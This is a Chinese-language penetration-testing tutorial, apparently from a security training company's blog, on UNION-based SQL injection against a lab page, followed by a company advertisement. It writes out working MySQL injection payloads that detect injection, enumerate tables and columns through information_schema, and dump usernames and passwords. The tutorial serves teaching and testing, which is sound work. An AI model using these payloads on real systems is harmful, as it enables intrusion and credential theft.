concatmysqlsql注入_渗透测试之SQL注入(2)

渗 透 测 试

之 SQL 注 入(2)

前言

01

整型注入和字符型注入的区别

整形注入&＃xff1a;

?id &＃61; 1 and 1 &＃61; 1     //页面无变化

?id &＃61; 1 and 1 &＃61; 2     //页面回显报错

字符型注入&＃xff1a;

?id &＃61; 1’ and 1 &＃61;1 #     //页面无变化

?id &＃61; 1’ and 1 &＃61;2 #     //页面回显报错

此外常见的注释符还有&＃xff1a;%23、-- (空格)、--&＃43;

02

常用内置函数(以mysql为例)

1. database() 函数
   作用&＃xff1a;查看当前连接的数据库名称
   SQL语句&＃xff1a;select database();

2. user() 函数
   作用&＃xff1a;查看当前连接数据库的用户
   SQL语句&＃xff1a;select user();

3. version() 函数
   作用&＃xff1a;查看数据库的版本
   SQL语句&＃xff1a;select version();

4. concat(str1,str2) 函数
   作用&＃xff1a;连接两个字符串并传入数据库
   SQL语句&＃xff1a;select concat(username,password) from user; 实现无间隔连接字符串username和password

   

5. concat_ws(separator,str1,str2) 函数
   作用&＃xff1a;用分隔符连接两个字段的字符串
   SQL语句&＃xff1a;select concat_ws(&＃39;--&＃39;,username,password) from user; 实现用分隔符"--"连接字符串username和password

   

6. group_concat(str1,str2) 函数
   作用&＃xff1a;将多行查询结果以逗号分隔全部输出
   SQL语句&＃xff1a;select group_concat(username,password) from user; 实现将每一行的字符串username和password连接起来&＃xff0c;多行之间用逗号隔开&＃xff0c;多行一起输出.

   

7. group_concat(concat_ws(seperator,str1,str2)) 函数
   作用&＃xff1a;将多行查询结果以逗号分隔全部输出&＃xff0c;每一行的结果可用设置的分隔符作字段的间隔,实现将每一行的字符串username和password用符号"--"连接起来&＃xff0c;多行之间用逗号隔开&＃xff0c;多行一起输出.

   

03

常见注入手法详细步骤

  (列举字符型注入)

  如下图所示访问一个正常的页面。

  在url后添加?id&＃61;1 如下图所示页面回显正常。

  判断是否存在注入&＃xff1a;在id&＃61;1添加 ’ 回车后页面报错&＃xff0c;说明可能存在sql注入。

  判断注入类型&＃xff1a;如下图所示在url内输入?id &＃61; 1 and 1&＃61;1和?id&＃61;1 and 1 &＃61;2 页面均回显正常。

  继续判断,再次输入?id&＃61;1’ and 1&＃61;1 #后页面回显报错。

  更换注释符继续判断,如图所示?id&＃61;1’ and 1&＃61;1 --&＃43;回显正常,?id&＃61;1’ and 1&＃61;2 --&＃43;页面回显报错

  根据页面回显及注入语句判断该注入类型为字符型注入。

  根据order by或 group by判断列数&＃xff1a;如图所示当列数为4时页面报错&＃xff0c;为3时页面回显正常&＃xff0c;因此判断为3列。

  判断显示位&＃xff1a;?id&＃61;-1&＃39; union select 1,2,3 --&＃43;  如图所示回显位为2和3。

  查看敏感信息&＃xff1a;

?id&＃61;-1&＃39; union select 1,&＃64;&＃64;datadir,3 --&＃43;        //返回当前数据路的存放路径

  ?id&＃61;-1&＃39; union select 1,&＃64;&＃64;version_compile_os,&＃64;&＃64;basedir --&＃43;      //返回操作系统版本和数据库安装路径

  ?id&＃61;-1&＃39; union select 1,database(),3 --&＃43;  //返回库名

  获得当前库内(security)所有的表名&＃xff1a;?id&＃61;-1&＃39; union select 1 ,group_concat(table_name), 3 from information_schema.tables where table_schema&＃61;database()--&＃43;

  获取users表内的列名&＃xff1a;?id&＃61;-1&＃39; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema&＃61;database() and table_name&＃61;&＃39;users&＃39;--&＃43;

 查看用户名和密码&＃xff1a;?id&＃61;-1&＃39; union select 1,group_concat(username,password),3 from users --&＃43;

关于我们&＃xff1a;

北京冠程科技有限公司(Beijing GctechTechnologyCo.,Ltd.)是一家集人才、技术和经验于一体的&＃xff0c;提供全面网络安全解决方案的专业服务商。冠程科技致力于为各行业的网络安全需求提供软件研发和通用解决方案&＃xff0c;业务领域主要包括基础服务、咨询业务、产品研发和安全培训四大版块&＃xff0c;各版块相互独立又相辅相成&＃xff0c;完美阐释了“专业服务、全程服务、延伸服务”的服务体系和“单一业务与长远目标相融合”的服务理念。

关注冠程科技&＃xff0c;关注网络安全&＃xff01;

总公司&＃xff1a;北京冠程科技有限公司

地址&＃xff1a;北京市昌平区科技园区东区产业基地企业墅上区一号楼九单元四层

河北分公司&＃xff1a;河北镌远网络科技有限公司(隶属于冠程科技的河北分公司)

地址&＃xff1a;河北省邯郸市丛台区中华北大街193号慧谷大厦14层1418号

实训基地&＃xff1a;河北省石家庄市电子信息学校冠程科技研究与实训中心

欢迎扫描关注我们&＃xff0c;及时了解更多关于网络安全相关知识